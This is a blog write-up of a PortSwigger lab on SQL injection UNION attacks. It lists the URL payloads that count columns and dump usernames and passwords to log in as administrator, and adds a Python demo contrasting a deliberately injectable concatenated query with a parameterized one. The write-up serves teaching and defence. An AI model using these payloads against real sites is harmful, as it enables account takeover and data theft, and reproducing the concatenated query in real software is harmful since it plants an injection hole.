SQL INJECTION UNION ATTACK

Lasata Maharjann
Mar 5, 2024


This blog will provide an exploration of SQL injection, with a specific focus on the SQL Injection UNION attack. The content will revolve around practical demonstrations utilizing the laboratory exercises available on https://portswigger.net/web-security/all-labs.

SQL Injection, commonly referred to as SQLi, is a web security vulnerability that allows an attacker to interfere with the queries an application makes to its database. Exploiting it lets the attacker view data they are not normally able to retrieve. In many cases the attacker can also modify or delete that data, causing persistent changes to the application’s content or behaviour.

SQL Injection Attack

SQL injection covers a variety of attacks and techniques, each applicable in distinct situations. Several common examples of SQLi include:

1. Retrieving Hidden Data: This involves modifying a SQL query to extract additional results that are not typically visible.

2. Subverting Application Logic: Attackers manipulate a query to disrupt the normal flow of an application’s logic.

3. UNION Attacks: Exploiting the UNION SQL operator to combine and retrieve data from different tables in the database.

4. Blind SQLi: The results of a query, controlled by the attacker, are not directly disclosed in the application’s responses.

Let’s now delve into the specifics of SQL Injection UNION attacks:

When an application has a SQL injection vulnerability and the results of the query are returned within the application’s responses, the UNION keyword can be used to retrieve data from other tables within the database. This is commonly known as a SQL injection UNION attack.

Learning Path:

Web Security Academy > SQL injection > UNION attacks > Lab

Lab Description:
This lab contains a SQL injection vulnerability in the product category filter. The results from the query are returned in the application’s response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs. The database contains a different table called users, with columns called username and password. To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.

STEPS:

Step 1:
On first entering the lab, you will see a web store with products in several categories. The “Refine your search” feature lets users narrow the listing to a specific product category.

Step 2:

When refining the search to a specific category, such as Accessories, the URL bar shows a parameter of the form “category=Accessories”. This parameter is inserted into the underlying SQL query, which looks something like SELECT * FROM products WHERE category = 'Accessories' AND released = 1.

Step 3:

Changing the parameter to Accessories' in the URL bar produces an internal error. The extra quote terminates the string literal early, so the query becomes something like SELECT * FROM products WHERE category = 'Accessories'' AND released = 1, which leaves an unbalanced quote and causes a SQL syntax error.

Step 4:

Now, let’s explore the UNION aspect by using NULL values to determine the number of columns returned by the original query. To achieve this, we append “Accessories'+union+select+null,null” to the URL. This input is interpreted as follows: SELECT * FROM products WHERE category = 'Accessories' UNION SELECT null,null.

Step 5:
Having received a successful response, we can infer that the query returns two columns. To find out which columns accept string data, a test query “Accessories'+union+select+'test','test1'” is used. A successful response indicates that both columns accept string values.

Step 6:

Injecting “Accessories'+union+select+username,password+from+users--” into the URL parameter results in a query such as SELECT * FROM products WHERE category = 'Accessories' UNION SELECT username,password FROM users--', where the trailing quote is commented out by the --. This query returns the usernames and passwords of all users, including the administrator.

Step 7:

With the discovered credentials of the administrator, we can proceed to log in to the web page, thereby successfully completing the lab.
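The following Python script is an added illustration, not part of the lab or the original post. It uses an in-memory SQLite database as a stand-in for the lab’s database (the lab does not state which database engine it uses), with constructed sample rows in products and users tables using the table and column names from the lab description. It recreates the category filter from Step 2 in two forms: the string-concatenated query that the payloads from Steps 3 and 6 turn into a syntax error and a UNION respectively, and a parameterized version of the same query, in which the database receives the whole input as one literal category value and never parses it as SQL.

```python
import sqlite3

# Constructed sample data, modelled on the lab's products and users tables.
# The real lab schema and rows are not shown on the page; these are assumptions.
PRODUCTS = [
    ("Pencils", "Accessories", 1),
    ("Sticker Pack", "Accessories", 1),
    ("Unreleased Gadget", "Accessories", 0),  # released = 0, hidden by the filter
    ("Lamp", "Lifestyle", 1),
]
USERS = [
    ("administrator", "constructed-admin-secret"),  # constructed value
    ("wiener", "peter"),
]

# Step 3 input: a single stray quote.
QUOTE_PROBE = "Accessories'"
# Step 6 payload, URL-decoded ('+' in the query string is a space).
UNION_PAYLOAD = "Accessories' UNION SELECT username,password FROM users--"


def setup_db():
    """Create the in-memory database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (name TEXT, category TEXT, released INTEGER);
        CREATE TABLE users (username TEXT, password TEXT);
        """
    )
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def filter_vulnerable(conn, category):
    """The pattern behind Steps 2-6: the input is pasted into the SQL text.

    A quote in the input closes the string literal, so what follows is parsed
    as SQL; the trailing '--' comments out " AND released = 1". The SELECT
    lists two columns so that the two-column UNION from the lab lines up.
    """
    sql = ("SELECT name, category FROM products WHERE category = '"
           + category + "' AND released = 1")
    return conn.execute(sql).fetchall()


def filter_parameterized(conn, category):
    """Hardened form: the category is a bound parameter, never SQL text."""
    sql = "SELECT name, category FROM products WHERE category = ? AND released = 1"
    return conn.execute(sql, (category,)).fetchall()


def demo():
    """Run both query forms against a normal value and the two lab inputs."""
    conn = setup_db()
    result = {
        "normal_vulnerable": filter_vulnerable(conn, "Accessories"),
        "normal_parameterized": filter_parameterized(conn, "Accessories"),
        # Step 6: the vulnerable form returns users rows (and the unreleased
        # product, since the released filter is commented out); the
        # parameterized form finds no category literally named like the payload.
        "payload_vulnerable": filter_vulnerable(conn, UNION_PAYLOAD),
        "payload_parameterized": filter_parameterized(conn, UNION_PAYLOAD),
        "quote_parameterized": filter_parameterized(conn, QUOTE_PROBE),
    }
    # Step 3: the stray quote is a syntax error only when it reaches the parser.
    try:
        filter_vulnerable(conn, QUOTE_PROBE)
        result["quote_vulnerable"] = "no error"
    except sqlite3.OperationalError:
        result["quote_vulnerable"] = "SQL syntax error (Step 3)"
    return result


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

Running the script shows the same observations the lab walks through: the concatenated query errors on the stray quote, and under the Step 6 payload it returns the users rows alongside the products, while the parameterized query returns only the two released Accessories for the normal input and an empty result for both injected inputs.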

In a nutshell, we dived into SQL Injection stuff, focusing on the UNION attack. It’s like a sneaky way bad guys mess with a website’s database. We did a hands-on example to show how they can grab data and even snag admin logins. The takeaway? Keep your web defenses strong, write secure code, and regularly check for any shady business in your apps. Stay safe out there!
